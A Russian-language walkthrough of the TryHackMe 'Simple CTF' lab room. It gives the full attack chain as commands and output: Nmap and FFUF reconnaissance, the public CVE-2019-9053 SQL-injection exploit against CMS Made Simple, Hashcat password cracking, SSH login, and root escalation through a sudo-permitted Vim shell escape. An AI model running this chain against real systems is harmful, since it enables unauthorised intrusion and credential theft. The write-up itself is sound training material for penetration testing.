
Профессиональное прохождение CTF 'Simple' на TryHackMe, охватывающее разведку, SQL-инъекцию в CMS Made Simple (CVE-2019-9053), восстановление учётных данных, доступ по SSH, повышение привилегий через Vim и компрометацию root.
Профессиональное прохождение комнаты TryHackMe Simple CTF, охватывающее разведку, SQL-инъекцию в CMS Made Simple (CVE-2019-9053), восстановление учётных данных, доступ по SSH, повышение привилегий через Vim и получение root.
Полное прохождение комнаты Simple CTF на TryHackMe, охватывающее разведку, перебор, эксплуатацию, восстановление учётных данных, повышение привилегий и захват флагов.
| Поле | Значение |
|---|---|
| Платформа | TryHackMe |
| Название комнаты | Simple CTF |
| Сложность | Лёгкая |
| Категория | Веб-эксплуатация и повышение привилегий в Linux |
| Автор | Saahil Gupta (ImperialX1104) |
Цель этой комнаты:
Обнаружение хоста
│
▼
Сканирование портов
│
▼
Перебор каталогов
│
▼
Обнаружение CMS
│
▼
Определение версии
│
▼
SQL-инъекция (CVE-2019-9053)
│
▼
Извлечение учётных данных
│
▼
Взлом пароля
│
▼
Доступ по SSH
│
▼
Флаг пользователя
│
▼
Повышение привилегий
│
▼
Флаг root
Первым шагом была проверка связи с целевой машиной.
ping 10.49.175.174
Хост успешно ответил, подтвердив, что он доступен.

Было выполнено полное сканирование Nmap для выявления открытых служб.
nmap -A -v 10.49.175.174
| Порт | Служба | Версия |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 80 | HTTP | Apache 2.4.18 |
| 2222 | SSH | OpenSSH 7.2p2 |

Перейдя на целевой веб-сервер, мы увидели стандартную страницу Apache.
http://10.49.175.174

На этом этапе очевидной поверхности атаки не было.
Для поиска скрытых ресурсов был выполнен перебор каталогов с помощью FFUF.
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200
simple [Status: 301]

Был обнаружен каталог /simple.
Перейдя по найденному каталогу, мы обнаружили установленную CMS.
http://10.49.175.174/simple

CMS Made Simple 2.2.8
Номер версии впоследствии оказался критическим.
Версия CMS была исследована с помощью SearchSploit.
searchsploit "CMS Made Simple"
CMS Made Simple < 2.2.10 - SQL Injection

Была выявлена известная SQL-инъекция.
Эксплойт был скопирован локально для анализа и выполнения.
searchsploit -m 46635
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

Публично доступный эксплойт был запущен против целевой CMS.
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt
Эксплойт успешно извлёк информацию из базы данных.
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

| Элемент | Значение |
|---|---|
| Имя пользователя | mitch |
| [email protected] | |
| Salt | 1dac0d92e9fa6bb2 |
Извлечённый хеш был взломан с помощью Hashcat.
hashcat -m 20 hash.txt --show
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
| Поле | Значение |
|---|---|
| Имя пользователя | mitch |
| Пароль | secret |

Восстановленные учётные данные были проверены на SSH-службе.
ssh [email protected] -p 2222
secret
Welcome to Ubuntu 16.04.6 LTS

Успешная аутентификация предоставила доступ к оболочке от имени пользователя mitch.
После получения доступа флаг пользователя был найден в домашнем каталоге Mitch.
whoami
cd ~
cat user.txt
G00d j0b, keep up!

Проверка прав sudo выявила интересную конфигурацию.
sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim

Эта конфигурация позволяет пользователю запускать Vim с привилегиями root без ввода пароля.
Запуск Vim с правами root:
sudo vim
Поскольку Vim работал с повышенными привилегиями, его можно было использовать для доступа к файлам, принадлежащим root.

Флаг root был найден в каталоге пользователя root.
:! cat /root/root.txt
W3ll d0n3. You made it!

G00d j0b, keep up!
W3ll d0n3. You made it!
Сканирование Nmap
↓
Веб-разведка
↓
Обнаружение каталога (/simple)
↓
CMS Made Simple 2.2.8
↓
Поиск через SearchSploit
↓
CVE-2019-9053 SQL-инъекция
↓
Извлечение учётных данных
↓
Взлом хеша
↓
Вход по SSH (mitch:secret)
↓
Флаг пользователя
↓
sudo -l
↓
Повышение привилегий через Vim
↓
Флаг root
Уязвимая CMS не была видна на главной странице и требовала перебора каталогов для обнаружения.
Знание точной версии CMS привело напрямую к известной уязвимости.
Восстановленные учётные данные следует всегда проверять на всех доступных службах.
Разрешение привилегированного выполнения редакторов, таких как Vim, может привести к полной компрометации системы.
Эта комната продемонстрировала полную цепочку атак — от первоначальной разведки до полного получения root. Комбинируя методы перебора веб-приложений, эксплуатации SQL-инъекций, взлома паролей и повышения привилегий в Linux, был достигнут полный контроль над целевой системой.
Комната служит отличным введением в методологию реального пентеста и подчёркивает важность своевременного обновления программного обеспечения, безопасности учётных данных и контроля доступа по принципу минимальных привилегий.
Saahil Gupta (ImperialX1104)
⭐ Если вам показалось это прохождение полезным, подумайте о том, чтобы поставить звезду репозиторию и связаться со мной на GitHub.